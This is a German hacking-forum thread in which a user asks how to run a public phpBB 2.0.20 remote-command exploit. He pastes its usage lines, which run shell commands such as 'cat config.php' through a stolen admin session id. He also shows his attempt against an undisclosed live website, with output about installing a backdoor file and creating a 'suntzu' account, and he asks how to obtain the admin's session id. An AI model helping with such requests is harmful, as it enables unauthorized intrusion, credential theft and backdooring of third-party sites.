php 2.0.20 Anwenden

[floex]

Hi ich weiss nicht wie ich diesen Exploit anwende
http://www.milw0rm.com/exploits/1780 ich habe schon hacksektor.dl.am durchsucht und dieses forum auch aber nirgentwo hab ich was gefunden wie ich diesen exploit genau anwende ;_; könnte jemand ein Video tut machen wie man ihn benutzt?

[-=Player=-]

als erstes brauchst du "active perl" um perl nutzten zu können.
und wenn du dann die pl datei über die konsole öffnest, ist dort schon eine beschreibung drin.

[floex]

als erstes brauchst du "active perl" um perl nutzten zu können.
und wenn du dann die pl datei über die konsole öffnest, ist dort schon eine beschreibung drin.

Perl? ich seh da php aber nich perl ...

Code:

#!/usr/bin/php -q -d short_open_tag=on
<?

bzw: das hat einer bei hacksektor gesagt

Du musst das Exploit auf einen php-fähigen Space uppen und aufrufen.

http://++++++++++.cc/showthread.php?...t=phpBB+2.0.20

//EDIT

wie ruft man den ein son ein php exploit auf einem Webspace auf?

[hersch24]

als erstes brauchst du "active perl" um perl nutzten zu können.
und wenn du dann die pl datei über die konsole öffnest, ist dort schon eine beschreibung drin.

schande über dein haupt player ^^

#!/usr/bin/php

hier kannst du es nachlesen http://www.free-hack.com/viewtopic.php?t=18057

wenn das nicht funzt und du nur den quellcode in der cmd angezeigt bekommst dann benutze xampp dazu oder lade es eben auf einen webspace der php ünterstutz + die nötigen befehle dazu

[floex]

als erstes brauchst du "active perl" um perl nutzten zu können.
und wenn du dann die pl datei über die konsole öffnest, ist dort schon eine beschreibung drin.

schande über dein haupt player ^^

#!/usr/bin/php

hier kannst du es nachlesen http://www.free-hack.com/viewtopic.php?t=18057

wenn das nicht funzt und du nur den quellcode in der cmd angezeigt bekommst dann benutze xampp dazu oder lade es eben auf einen webspace der php ünterstutz + die nötigen befehle dazu

ich versteh nur BANHOF -.-'
könntest du nich ein video tut machen in dem du mir /uns zeigst wie das geht mit dem Exploit ich würde dann sicher alles verstehen.

[-=Player=-]

jaaaa ist ja gut, habs zu schnell angeguckt :evil:

dann halt php, das prinzip bleibt trotzdem gleich.

@floex
warum willst du unbedingt ein video tutorial haben? kannst du etwas nicht lesen?
außerdem hat Suicide in der Exploits sektion ein thread vervasst der als wichtig markiert wurde "Wie führe ich ein PHP-Exploit aus?" dort wird alles schritt für schritt SCHRIFTLICH erklärt

[floex]

jaaaa ist ja gut, habs zu schnell angeguckt :evil:

dann halt php, das prinzip bleibt trotzdem gleich.

@floex
warum willst du unbedingt ein video tutorial haben? kannst du etwas nicht lesen?
außerdem hat Suicide in der Exploits sektion ein thread vervasst der als wichtig markiert wurde "Wie führe ich ein PHP-Exploit aus?" dort wird alles schritt für schritt SCHRIFTLICH erklärt

ok
1. ich weiss wie man ein PHP exploit ausführt
2. hab ich nich gefragt wie man ihn ausführt
3. ich habe gefragt "wie ruft man den ein son ein php exploit auf einem Webspace auf?"
4. Ich wollte ein Video haben , weil ich den exploit nicht genau verstehe

Das steht im Exploit wen ich ihn aufrufe:

Code:

-> you need an admin sid, works regardless of magic_quotes_gpc settings
tested and working against a fresh PhpBB installation

Usage: php php20.php host path sid cmd OPTIONS
host:       target server (ip/hostname)
path:       path to PhpBB
sid:        session id
cmd:        a shell command
Options:
   -p[port]:    specify a port other than 80
   -P[ip:port]: specify a proxy
Examples:
php php20.php localhost /phpbb/ 8db5cef976c7e0f51c25c92152b56881 cat config.php
php php20.php localhost /phpbb/ 8db5cef976c7e0f51c25c92152b56881 ls -la -p81
php php20.php localhost / 8db5cef976c7e0f51c25c92152b56881 ls -la -P1.1.1.1:80

5. Das ist die sid des admins:

Code:

a5de97d77a4e7ded42c6fe8b40ada6ab

6. wenn ich das "php php20.php www.muesst-ihr-nicht-wissen.de / a5de97d77a4e7ded42c6fe8b40ada6ab -ls -la" jetzt eingebe kommt...

Code:

step 0 -> check if suntzu.php is already installed...
Step 0b -> check if exploit has already succeeded but suntzu.php deleted, try t
 login as suntzu...
step 0c -> query database to create a "suntzu" user with password "suntzu"...
Unable to modify table... maybe wrong admin sid

So jetzt weiss ich nich mehr weiter ich habe nur gefragt wie man diesen Exploit ausführt , weil die rede war das man den erst auf einem php fähigem Webspace uploaden soll und dann ausführen soll.

so ich hoffe das war ausführlich genug um mir eine klare Antwort auf meine Frage "Wie führe ich diesen Epxloit aus mit den richtigen commands ?" ...

mfg floex

EDIT//

ok ich hab grade herausgefunden das das nicht die sid des Admins ist ...

Frage: wie bekomme ich diese sid denn raus? :o